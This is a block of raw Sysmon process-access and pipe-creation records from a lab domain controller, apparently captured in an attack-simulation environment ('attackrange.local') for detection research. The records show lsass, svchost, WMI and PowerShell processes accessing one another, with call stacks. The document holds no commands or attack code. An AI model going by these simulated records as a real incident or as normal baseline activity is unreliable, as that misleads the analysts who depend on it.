12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.377{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.377{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.377{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:50.362{266CAFBE-646E-6064-1A00-00000000AE01}2284\PSHost.132616656461640554.2284.DefaultAppDomain.RemoteFXvGPUDisablementC:\Windows\System32\RemoteFXvGPUDisablement.exe 10341000x80000000000000001419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.330{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.330{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.330{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.330{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.924{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.924{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.768{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 